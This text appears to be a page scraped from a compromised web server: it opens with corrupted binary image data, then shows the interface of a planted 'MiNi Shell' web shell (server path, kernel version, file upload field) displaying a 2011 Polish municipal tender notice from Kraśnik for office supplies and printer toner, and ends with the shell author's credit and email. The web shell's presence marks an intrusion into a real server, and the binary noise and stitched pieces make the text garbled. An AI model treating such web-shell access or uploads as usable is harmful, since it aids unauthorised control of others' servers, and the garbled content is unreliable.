JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/91699-N-2011.html

<p class="kh_header"><b>Kraśnik: Dostawę artykułów biurowych, papierniczych i materiałów eksploatacyjnych
w ramach projektu Dobry start</b><br>
<b>Numer ogłoszenia: 91699 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę artykułów biurowych, papierniczych i materiałów eksploatacyjnych
w ramach projektu Dobry start.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów biurowych, papierniczych 
i materiałów eksploatacyjnych w ramach projektu Dobry start. Zakres, ilość oraz kody CPV zamawianych artykułów określone zostały w załączniku Nr 1 do SIWZ.
Wskazanie na znak firmy określa minimalne wymagania co do parametrów technicznych poszczególnych składników zamówienia oraz gwarancję jakości.
Wymienione w załączniku Nr 1, zadanie nr 2 materiały muszą być oryginalne (fabrycznie nowe), nie dopuszcza się dostawy tuszy i tonerów regenerowanych. 
W odniesieniu do wszystkich  pozycji Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych.
Przez produkt równoważny Zamawiający rozumie  produkt (dotyczy tonerów oraz tuszy):
	fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji, wytworzony seryjnie w cyklu produkcyjnym zgodnym z normą ISO 9001 oraz ISO 14001,
	nie noszących śladów poprzedniego użytkowania,
	który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny,
	który w żadnym stopniu nie narusza praw patentowych,
	który nie ogranicza współpracy z programem drukarki monitorującej stan zasobników 
z tuszem lub tonerem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8, 30.12.51.10-5, 22.60.00.00-6, 30.19.21.25-3, 30.19.21.21-5, 30.19.21.00-2, 30.19.76.20-8, 30.19.94.10-7, 24.91.00.00-6, 30.19.92.30-1, 30.19.25.00-6, 30.19.21.30-1, 30.19.76.44-2, 30.19.21.22-2, 30.23.43.00-1, 30.19.95.00-5, 22.85.10.00-0, 22.81.50.00-6, 30.19.72.20-4, 44.42.42.00-0, 30.19.21.33-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie oświadczenia (zał. nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia (zał. nr 5 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT zmianie ulega kwota wynagrodzenia netto, bez zmiany kwot brutto</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lublin.pl/miastokrasnik/index.php?id=85<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
pok. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2011 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.04.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego 
w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów biurowych i papierniczych w ramach projektu Dobry start..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykuł	-	Ilość
Cienkopisy czarne	-150
Cienkopisy czerwone-150
Cienkopisy niebieskie -150
Cienkopisy zielone-150
Długopisy - czarne żelowe-150
Gumki pelikan-40
Karteczki nie klejone białe opak.-50
Karteczki samoprzylepne 70 x 70 A 100 opak.-50
Karteczki samoprzylepne20 x 50 A 100 opak.-50
Klej biurowy w sztyfcie 35g-50
Koperty białe SK A4/a1000/-1
Korektor w taśmie-30
Koszulki  foliowe A4/A100/-60
Koszulki  foliowe A5/A100/-40
Koszulki foliowe A4 (twarde) /A100/-	20
Ołówki HB-200
Papier  ksero A4 (gramatura: 80g/m2; białość CIE 161)- ryzy-160
Papier ksero kolor A4 (gramatura: 80g/m2; po - ryzy-100
Papier ksero A3 (gramatura: 80g/m2; białość CIE 161) - ryzy-20
Papier na dyplomy A4 -opak. 200g/m2 po 100 ark. - biały	-8
Papier wizytówkowy A4 opak 200g/m2 po 100 ark. (płótno biały)-5
Pióra żelowe-150
Pióra wieczne (na naboje, stalowa stalówka, korpus i nasadka w kolorze matowej stali, wraz z etui)	-20
Płyty CD	-100
Płyty CD w etui-300
Segregatory A4 grube oklejane z okuciem-200
Segregatory cienkie A4 oklejane z okuciem-200
Skoroszyty plastikowe do segregatorów-	200
Skoroszyty tekturowe/-50
Skorowidz  A 5 - twardy oklejane-40
Spinacze duże - opak.-50
Spinacze małe - opak.-50
Taśma bezbarwna klejąca 22mm-50
Teczka z gumką -kolor	-100
Teczka tekturowa powlekana z rączką szer. Do 5 cm-20
Teczki wiązane	-50
Temperówka-20
Zakreślacze typ stabilo-40
Zeszyt w kratkę 60 kart-60
Zeszyt w kratkę 80 kart (twarda opr)-20
Zeszyt w kratkę A 4 80 kart	-10
Zszywki - opak.-50
Papier do kolorowego druku laserowego. Gramatura 250 g/m2, białość 160 CIE, matowy, A4-8
Dziurkacz metalowy z ogranicznikiem (min 30 stron)-20
Zszywacz metalowy (min 30 stron)-20
szuflady plastikowe na dokumenty, przeźroczyste-20
Markery suchościeralne (do pisania na tablicy) komplet 4 kolory-6
Markery kolorowe grube - czarne-40
Markery kolorowe grube - zielone-40
Markery kolorowe grube - niebieskie-40
Markery kolorowe grube - czerwone-40
CD marker czarny - cienki-15
Przyborniki stojące na biurko (przeźroczyste)-	10
Nożyczki 21 cm-30
Kredki BAMBINO 12 kolorów (w twardej oprawie)	-30
Flamastry 20 kolorów-24
magnesy do tablicy po 6 szt/opak.-12
Płyty DVD w etui-100
Pamięć przenośna - 4GB-10
Bloki szkolne w kratkę /A4-20
Blok rysunkowy A4 biały-50
Blok rysunkowy A4 kolorowy	-50
Blok techniczny kolorowy A 4-50
Blok techniczny biały A 4-50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.25-3, 30.19.21.21-5, 30.19.21.00-2, 30.19.76.20-8, 30.19.94.10-7, 24.91.00.00-6, 30.19.92.30-1, 30.19.25.00-6, 30.19.21.30-1, 30.19.76.44-2, 30.19.21.22-2, 30.23.43.00-1, 30.19.95.00-5, 22.85.10.00-0, 22.81.50.00-6, 30.19.72.20-4, 44.42.42.00-0, 30.19.21.33-2, 30.23.74.30-2, 30.19.71.00-7, 30.19.73.30-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych w ramach projektu Dobry start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. TUSZE  CZARNE
	Ilość (szt.)
1.  	Tusz do HP deskjet cardrige (HP Bleck - 21)	6
2.  	Tusz do HP Deskjet F 2180	4
3.  	Tusz do HP Officejet  Pro K5400	1

II. TUSZE KOLOROWE
4.  	Tusz do HP Deskjet F 2180 /11 ml/	3
5.  	Tusz do HP Officejet Pro K5400 (kompl. 3 kolory)	1

III. TONERY

6.	Toner do HP LaserJet   P 2015	5
7.	Toner do HP  LaserJet P1005	2
8.	Toner do drukarki HP LaserJet P1006	2
9.	Toner do drukarki HP LaserJet 1020	2
10.	Toner do HP COLOR LasertJet 1600 1 komp - 3 kolor	1

IV. TONERY DO KSEROKOPIAREK

11.	Toner do ksera RICOH Aficio -220/270 2110D/2210D	3
12.	Toner do ksera KYCERA KM 1635 (TK 410)	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6, 22.60.00.00-6, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com